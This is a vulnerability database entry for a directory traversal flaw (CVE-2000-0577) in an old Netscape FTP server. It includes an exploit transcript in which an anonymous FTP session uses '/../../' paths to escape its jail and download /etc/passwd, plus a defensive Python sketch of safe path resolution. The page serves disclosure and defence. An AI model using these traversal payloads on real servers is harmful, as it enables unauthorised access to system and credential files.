CVE-2000-0577
CVSS 10.0
Published: 2000-06-21 00:00:00
Revised: 2008-09-10 15:05:04

[Original] Netscape Professional Services FTP Server 1.3.6 allows remote attackers to read arbitrary files via a .. (dot dot) attack.


[CNNVD] Netscape Professional Services FTP Server vulnerability (CNNVD-200006-079)

        Netscape Professional Services FTP Server version 1.3.6 contains a vulnerability. Remote attackers can read arbitrary files via a .. (dot dot) attack.

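- CVSS (base score)

CVSS score: 10 [Severe (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete shutdown of the system]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) is not currently available

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0577
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0577
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200006-079
(Official data source) CNNVD

- Other links and resources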

http://www.securityfocus.com/templates/archive.pike?list=1&msg=Pine.LNX.4.21.0006211351280.23780-100000@nimue.tpi.pl
(VENDOR_ADVISORY)  BUGTRAQ  20000621 Netscape FTP Server - "Professional" as hell :>
http://www.securityfocus.com/bid/1411
(UNKNOWN)  BID  1411
http://archives.neohapsis.com/archives/bugtraq/2000-06/0345.html
(UNKNOWN)  BUGTRAQ  20000629 (forw) Re: Netscape ftp Server (fwd)

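- Vulnerability information

Netscape Professional Services FTP Server vulnerability
Critical   Access validation error
2000-06-21 00:00:00 2005-07-27 00:00:00
Remote / Local
        Netscape Professional Services FTP Server version 1.3.6 contains a vulnerability. Remote attackers can read arbitrary files via a .. (dot dot) attack.

- Advisories and patches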

        Users of affected software can contact Uwe Springmann for patch information.

- Vulnerability information (20046)

Netscape Professional Services FTP Server (LDAP Aware) 1.3.6 FTP Server Vulnerability (EDBID:20046)
unix remote
2000-06-21 Verified
0 Michael Zalewski
N/A [Click to download]
source: http://www.securityfocus.com/bid/1411/info

Certain versions of the LDAP-aware Netscape Professional Services FTP Server (distributed with Enterprise Web Server) have a serious vulnerability which may lead to a remote or local root compromise. The vulnerability in essence is a failure of the FTP server to enforce a restricted user environment (chroot). By failing to do this an FTP (anonymous or otherwise) user may download any file on the system (/etc/passwd etc.) as well as upload files at will at the privilege level of the FTP daemon.

Furthermore (quoted from the original attached message) this FTP server supports LDAP users; different LDAP accounts are served on single physical UID. This means, any user can access and eventually overwrite files on other accounts; as it's used in cooperation with webserver, typically virtual web servers are affected. 

$ ftp ftp.XXXX.xxx
Connected to ftp.XXXX.xxx.
220-FTP Server - Version 1.36 - (c) 1999 Netscape Professional Services
220 You will be logged off after 1200 seconds of inactivity.
Name (ftp.XXXX.xxx:lcamtuf): anonymous
331 Anonymous user OK, send e-mail address as password.
Password:
230 Logged in OK
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd ../../../dupa
550 Can't change directory to
"/www1/customer/www.XXXX.xxx/a/n/o/n/anonymous/dupa" because No such
file or directory

[Well... this won't work... uh, lovely physical path, btw ;]

ftp> cd /../../../dupa
550 Can't change directory to
"/www1/customer/www.XXXX.xxx/a/n/dupa" because No such file or
directory
ftp> cd /../../../../dupa
550 Can't change directory to
"/www1/customer/www.XXXX.xxx/a/dupa" because
No such file or directory

[Erm? Good God!]

ftp> cd /../../../../../../../../etc/dupa
550 Can't change directory to "/etc/dupa" because No such file or
directory
ftp> cd /../../../../../../../../etc/
250 CWD command successful.
ftp> get /../../../../../../../../etc/passwd KUKU
local: KUKU remote: /../../../../../../../../etc/passwd
200 PORT successfull, connected to A.B.C.D port 62437
150-Type of object is "unknown/unknown". Transfer MODE is BINARY.
150 Opening data connection
226 File downloaded successfully (602 bytes, 602 bytes xmitted)
602 bytes received in 1.71 secs (0.34 Kbytes/sec)
ftp> quit
221-Goodbye. You uploaded 0 and downloaded 1 kbytes.
221 CPU time spent on you: 0.100 seconds.

$ cat KUKU
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
... 		
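
Added example (not part of the original advisory and not the vendor's code): the 550 replies above are consistent with a server that clamps relative arguments inside the user's virtual root but appends an absolute argument to the physical home directory before collapsing "..". The sketch below models that assumed behaviour next to a contained resolver; JAIL, naive_resolve and safe_resolve are hypothetical names, and the jail path is constructed from the shape of the path in the replies.

```python
import posixpath

# Constructed jail root, modelled on the physical path shape in the 550 replies.
JAIL = "/www1/customer/www.example/a/n/o/n/anonymous"

def naive_resolve(jail, cwd, arg):
    """Assumed model of the flawed mapping, inferred from the replies above."""
    if arg.startswith("/"):
        # Absolute argument is glued to the jail and '..' collapsed afterwards,
        # so every '..' strips one component of the jail path itself.
        return posixpath.normpath(jail + arg)
    # Relative argument is normalised in virtual space first (clamped at '/').
    virt = posixpath.normpath(posixpath.join(cwd, arg))
    return jail + virt

def safe_resolve(jail, cwd, arg):
    """Normalise inside the virtual root first, then map to the physical path."""
    virt = posixpath.normpath(posixpath.join("/", cwd, arg))
    virt = "/" + virt.lstrip("/")  # normpath preserves a leading '//'
    phys = posixpath.normpath(jail + virt)
    # Defence in depth: refuse anything that still lands outside the jail.
    if phys != jail and not phys.startswith(jail.rstrip("/") + "/"):
        raise PermissionError(arg)
    # Lexical check only: a real server must also resolve symlinks
    # (os.path.realpath) or run the session inside chroot().
    return phys

if __name__ == "__main__":
    # Arguments taken from the session transcript above.
    for arg in ("../../../dupa", "/../../../dupa",
                "/../../../../../../../../etc/passwd"):
        print(f"{arg!r:45} naive={naive_resolve(JAIL, '/', arg)}")
        print(f"{'':45} safe ={safe_resolve(JAIL, '/', arg)}")
```

With the contained resolver, every argument from the transcript maps to a path under the jail, so the request for /etc/passwd becomes a lookup for etc/passwd inside the user's own directory.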

- Vulnerability information

1435
Netscape Professional Services FTP Server Traversal Arbitrary File Access
Context Dependent Information Disclosure
Loss of Confidentiality Patch / RCS
Exploit Public Third-party Verified

- Vulnerability description

- Timeline

2000-06-21 Unknown
Unknown Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, the vendor has reportedly released a patch to address this vulnerability.

- Related references

- Vulnerability author

Unknown or Incomplete